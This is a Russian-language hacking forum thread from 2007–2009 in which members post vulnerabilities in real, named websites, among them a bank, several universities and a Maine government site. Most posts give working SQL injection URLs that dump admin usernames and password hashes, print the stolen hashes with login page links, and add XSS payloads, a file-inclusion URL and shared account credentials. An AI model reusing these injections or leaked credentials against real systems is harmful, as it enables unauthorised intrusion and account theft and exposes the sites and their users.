Уязвимости найденные вами
, sql-inj, php-incl, xss...
Дата публикации:
de1ay, 13.06.2007 - 21:22
Начну я.
Инклюд для начала.
QUOTE
zombie18, 16.06.2007 - 9:27
ну вот xss докучи...
QUOTE
в поле Ф.И.О. вписываем
CODE
"><script>alert(/xss/)</script>
+1
QUOTE
помоему в любое поле вообще... такую же байду:
CODE
"><script>alert(/xss/)</script>
+1
QUOTE
тоже куда хошь... ниче не фильтруется...
CODE
"><script>alert(/xss/)</script>
+1
QUOTE
в поиске пишем:
CODE
"><script>alert(/xss/)</script>
+1
вот тебе и юниаструм банк (^_~)
QUOTE
в поле Фамилия, Имя, Отчество: тот же баг у всех на ">
CODE
"><body onLoad=alert('xss')>
+1
QUOTE
при регистрации поле "ник" не фильтруется, можно написаль там к примеру:
CODE
"><script>alert('xss')</script>
чтобы посмотреть пример залогиньтесь с
e-mail:
[email protected]password: cIRLlQ
+1
QUOTE
уязвимо поле e-mail. пример использования:
CODE
http://www.klerk.ru/subscribe/register.php?email=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
de1ay, 29.07.2007 - 21:15
CODE
http://www.oninit.com/reference/index.php?page=[url]
de1ay, 7.08.2007 - 18:30
LZA Terminologijas komisijaОдин из местных универов.
CODE
http://termini.lza.lv/article.php?id=-1+union+select+1,2,3,concat_ws(user,0x3a,pass),5,6,7,8,9,1,2,3,4,5,6,7,8+from+users/*
user: red1
pass: $1$ugldXdZ6$D06H80Jn5ab5Ok3HymTv8/
de1ay, 21.08.2007 - 18:14
Big6: Information Skills for Student Achievement
Форум (цепляем по одному, кто админ незнаю, мемберлист не смотрел, там регаться надо
...):
Code
http://big6.com/showarticle.php?id=-1+union+select+concat_ws(username,0x3a,user_password),2,3,4,5+from+big6_users+limit+1,1/*
Блог (сразу админ):
Code
http://big6.com/showarticle.php?id=-1+union+select+concat_ws(user_login,0x3a,user_pass),2,3,4,5+from+blo_users+limit+0,1/*
Все хеши md5.
ZaHack, 21.08.2007 - 20:34
Не совсем по теме (тут больше веб-уязвимости), но все же:
Переполнение буфера обмена программы helpctr.exe
Уязвимые ОС: Win XP
При вводе в IE строки:
Code
hcp://w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.
происходит запуск самой программы helpctr.exe Это происходит из-за возникновения в приложении исключения (которое вызывается удаленно из браузера)
PS Практического применения эта уязвимость, конечно, не имеет, но наглядно показывает "надежность" продуктов от M$
PPS Работает не на всех компьютерах.
de1ay, 21.08.2007 - 23:07
Цитата | Quote(ZaHack @ 21.08.2007 - 20:34)
PS Практического применения эта уязвимость, конечно, не имеет, но наглядно показывает "надежность" продуктов от M$
А почему нет? Переполненяем буфер, передаём управление шелл-коду... Все.
de1ay, 28.08.2007 - 19:00
Code
http://www.varmint.org/ishop/index.php?GID=-1+union+select+1,2,version(),4,5,6,7,8,9,1,2/*
Таблицы лень подбирать...
de1ay, 28.08.2007 - 19:14
ГОРОДСКОЙ ЭЛЕКТРОТРАНСПОРТ
совмещённый трамвайно-троллейбусный сайтCode
http://stts.mosfont.ru/articles.php?gid=-1+union+select+1,table_name+from+information_schema.tables+limit+0,1/*
de1ay, 28.08.2007 - 20:06
www.crim.ncsu.eduCenter for Robotics and Intelligent MachinesДостаем логин и хеш:
Code
http://www.crim.ncsu.edu/project_detailed.php?id=-1+union+select+1,2,3,concat(user_login,0x3a,user_pass),5,6,7,8,9,1,2,3,4,5,6,7,8+from+wp_users+limit+0,1/*
admin:75bb40f591c0db371aba50f65741d73f
Можно сбрутить... Логинимся тут:
http://www.crim.ncsu.edu/login.phpСтатическая инфа:
Версия: 5.0.19-max-log
Пользователь:
[email protected]База: wp_crim
de1ay, 18.09.2007 - 7:18
VLG - Veterinary Leadership GroupCode
http://www.vlg.us/users_info.php?user=-1+union+select+1,2,3,4,5,6,7,8,concat(adm_username,0x3a,adm_password),1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,
6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5+from+cms_admin+limit+0,1/*
csos:2d7784bc6d2ee4d098ba1a941b8aeff6
jackrife:8c7516e35cc1316c549d2e0a6be7c3f4
http://www.vlg.us/login.php
de1ay, 27.09.2007 - 18:04
University of Chicago Experts Guide
Code
http://experts.uchicago.edu/experts.php?id=31+union+select+1,concat(user,0x3a,password),3,4,5,6,7,9,1,2,3,4,5,6,7, 8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,3+from+mysql.user+limit+1,1/*
root:0bd914e54597ba5d
tim:6203790e5a8f045f
www:688190236b17cea9
rlvoyer:3ccc14724f83db34
---
de1ay, 7.11.2007 - 10:14
Проверка, настройка партнерских программCode
http://se-t.net/stat.php?from=0&pid=841+union+select+1 ,2,login,email,passwd+from+users/*
Логин\Пароль\Email
de1ay, 7.04.2008 - 15:00
Maine Commission for Community ServiceCode
http://www.maineservicecommission.gov/MVF/article.php?ID=363+union+select+1,2,concat_ws
(0x3a,version(),database(),user()),4,5,6,7,8,9,1,2,3,4/*
4.1.20
: m41n3s3r_
: m41n3s3r_v0lunt3@localhost
dimusik, 5.01.2009 - 19:12
не нашёлся куда запостить, решил здесь
Depositfiles.com без 60сек
Найден баг на депозите теперь ждать 60 секунд не обязательно
Видео: 1440 x 900 3508Kbps
Формат: AVI
Звук: Нет
Продолжительность: 30 сек
Вес: 1.3 МБ
В Опере поробовал вид-стиль-режим пользователя
Jon-dog, 31.05.2009 - 20:17
Давно сюда ничего не писали.
SoftoRooM © 2004-2024